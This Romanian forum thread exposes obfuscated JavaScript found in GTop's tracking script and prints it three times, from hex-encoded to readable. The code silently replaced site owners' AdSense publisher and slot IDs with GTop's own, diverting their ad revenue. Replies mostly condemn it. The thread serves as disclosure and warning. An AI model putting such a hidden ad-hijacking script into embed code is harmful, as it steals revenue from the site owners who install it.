Iată ce s-a descoperit în codul de urmărire de la GTop

[ultramania]

Pentru monitorizarea traficului unui site, statistici, analize și comparații este de-ajuns să adaugi pe site-ul propriu un cod de urmărire. Servicii de monitorizare sunt multe, oferite gratuit sau pe bază de abonament.

Dar te-ai gândit ce se poate ascunde într-un cod aparent inofensiv?
Iată cum un asemenea serviciu oferit gratuit de proiectul românesc de monitorizare trafic web GTop te poate afecta financiar, prin modificarea ID-urilor de publisher pentru reclamele AdSense de pe site-ul tău.
„Nu știu dacă a avut cineva vreodată curiozitatea să vadă cum arată js-ul pe care gtop îl încarcă pe site-ul vostru pentru a monitoriza traficul.
Pentru cine vrea să-l vadă, fișierul este aici și, după cum puteți vedea, este comprimat însă poate fi decomprimat foarte ușor folosind acest site.
Curios fiind, l-am decomprimat sa văd și eu cum arată.Totul bine și frumos până am dat de aceste linii:

Code: Select all

var _0x47ca = ["\x67\x6F\x6F\x67\x6C\x65\x5F\x61\x64\x73\x5F\x66\x72\x61\x6D\x65", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", "\x73\x72\x63", "\x6D\x61\x74\x63\x68", "\x63\x61\x2D\x70\x75\x62\x2D\x32\x36\x31\x32\x39\x30\x30\x36\x37\x32\x39\x32\x31\x36\x38\x32", "\x72\x65\x70\x6C\x61\x63\x65", "\x73\x6C\x6F\x74\x6E\x61\x6D\x65\x3D\x31\x39\x33\x34\x37\x33\x30\x38\x30\x33"];
var _0xfcf0 = [_0x47ca[0], _0x47ca[1], _0x47ca[2], _0x47ca[3], _0x47ca[4], _0x47ca[5], _0x47ca[6]];
function sSt() {
  for (i = 1; i <= 4; i++) {
     if (document[_0xfcf0[1]](_0xfcf0[0] + i)) {
         src = document[_0xfcf0[1]](_0xfcf0[0] + i)[_0xfcf0[2]];
         if (src[_0xfcf0[3]](/w=468/) && src[_0xfcf0[3]](/h=60/)) {
             var _0x2266x3 = src[_0xfcf0[5]](/(ca-pub-[0-9]+)/ig, _0xfcf0[4]);
             var _0x2266x3 = _0x2266x3[_0xfcf0[5]](/(slotname=[0-9]+)/ig, _0xfcf0[6]);
             document[_0xfcf0[1]](_0xfcf0[0] + i)[_0xfcf0[2]] = _0x2266x3
         }
     }
  }
};
if (site_id != 41219 && site_id != 23216) sSt();

Cum nu prea îmi place să încarc javascript-uri codate pe site-urile mele fără să știu despre ce e vorba, mi-am bătut puţin capul și am decodat și partea asta de cod, rezultatul obținut fiind acesta:

Code: Select all

var _0x47ca = ["google_ads_frame", "getElementById", "src", "match", "ca-pub-2612900672921682", "replace", "slotname=1934730803"];
var _0xfcf0 = [_0x47ca[0], _0x47ca[1], _0x47ca[2], _0x47ca[3], _0x47ca[4], _0x47ca[5], _0x47ca[6]];
function sSt() 
{    
   for (i = 1; i <= 4; i++) 
   {        
      if (document[_0xfcf0[1]](_0xfcf0[0] + i)) 
      {            
         src = document[_0xfcf0[1]](_0xfcf0[0] + i)[_0xfcf0[2]];            
         if (src[_0xfcf0[3]](/w=468/) && src[_0xfcf0[3]](/h=60/)) 
         {                
            var _0x2266x3 = src[_0xfcf0[5]](/(ca-pub-[0-9]+)/ig, _0xfcf0[4]);
            var _0x2266x3 = _0x2266x3[_0xfcf0[5]](/(slotname=[0-9]+)/ig, _0xfcf0[6]);
            document[_0xfcf0[1]](_0xfcf0[0] + i)[_0xfcf0[2]] = _0x2266x3            
         }        
      }    
   }
};

Mi s-a părut puțin cam ciudat sa vad pe acolo cuvinte precum "google_ads", "ca-pub-2612900672921682", sau "replace" asa ca am făcut câteva replace-uri și am obținut asta:

Code: Select all

var _0x47ca = ["google_ads_frame", "getElementById", "src", "match", "ca-pub-2612900672921682", "replace", "slotname=1934730803"];
var _0xfcf0 = [_0x47ca[0], _0x47ca[1], _0x47ca[2], _0x47ca[3], _0x47ca[4], _0x47ca[5], _0x47ca[6]];
function sSt() 
{    
   for (i = 1; i <= 4; i++) 
   {        
      if (document.getElementById("google_ads_frame" + i)) 
      {            
         src = document.getElementById("google_ads_frame" + i).src;            
         if (src.match(/w=468/) && src.match(/h=60/)) 
         {                
            var _0x2266x3 = src.replace(/(ca-pub-[0-9]+)/ig, "ca-pub-2612900672921682");
            var _0x2266x3 = _0x2266x3.replace(/(slotname=[0-9]+)/ig, "slotname=1934730803");
            document.getElementById("google_ads_frame" + i).src = _0x2266x3            
         }        
      }    
   }
}; 

Știți ce face codul asta (ce făcea de fapt)? Înlocuiește id-urile voastre de la reclamele 468x60 de la Google AdSense cu id-urile celor de la gtop. Cu alte cuvinte înlocuiește RECLAMELE VOASTRE cu RECLAMELE LOR chiar pe SITE-URILE VOASTRE!!!
Am spus "făcea" pentru ca acum AdSense și-a schimbat codurile și micuțul lor script de mai sus nu mai funcționează (cel puțin în testele mele nu a funcționat).
După cum puteți observa, în cod este următorul if : "if (site_id != 41219 && site_id != 23216) sSt();". Ce face acest if ? Ei bine, verifică dacă nu cumva codul este plasat pe unul din site-urile cu id-ul 41219 sau 23216 (id-uri care nu mai sunt active în acest moment), id-uri care presupun ca aparțineau site-urilor unor admini. În cazul în care codul este plasat pe un site cu un alt id fata de cele doua de mai sus, se executa function sSt() care face treaba cu codurile de la AdSense.”

Iată deci, de ce e este recomandat să te informezi temeinic despre schimbările pe care urează să le faci sau să ceri o părere avizată în domeniu înainte a pune orie fel de cod pe site-ul propriu.

[unpack]

Daca site_id nu e 41219 sau site_id nu e 23216 executa functia sSt iar functia sSt vad ca da replace la acele id-uri.Da bine ca acel cod se activeaza doar daca respectivul owner de website isi pune AdSense pe site.

if (site_id != 41219 && site_id != 23216) sSt();

Foloseam si eu Gtop. Josnic. Insa au gandit bine. :meme

[MARIUSEF]

Interesant!

[The Kalu]

Cine va pune sa folositi asa ceva cand aveti google analytics.

[Mădălin]

Wow.. mersi de informare!

[GamingWorld]

WOW, ce jegosi :)

[Tredash]

Mda, ce manarii fac cate unii... putin cam urat dupa parerea mea.

[sUperstar]

eu tot asa va faceam daca eram in locul lor

[Tredash]

Daca tie ti-ar face cineva asa ti-ar conveni? Efectiv ai tine reclamele pentru altii :)

[sharkstar]

hahahahahaha.
Odata ce folosesti AdSense.. Pune si tu T5 ...

[CRISZLY]

Mdea, n-am stiut, mai inainte mi-am eliminat site-ul de la ei.

[databasehunter]

adevaru e, ca multi dintre voi ,,detineti site-uri cu trafic mare"
gtop e o prostie oricum. si eu l-am folosit, aveam pus doar mini bannerul pentru track, nici nu m-am uitat in sursa ca nu avea rost.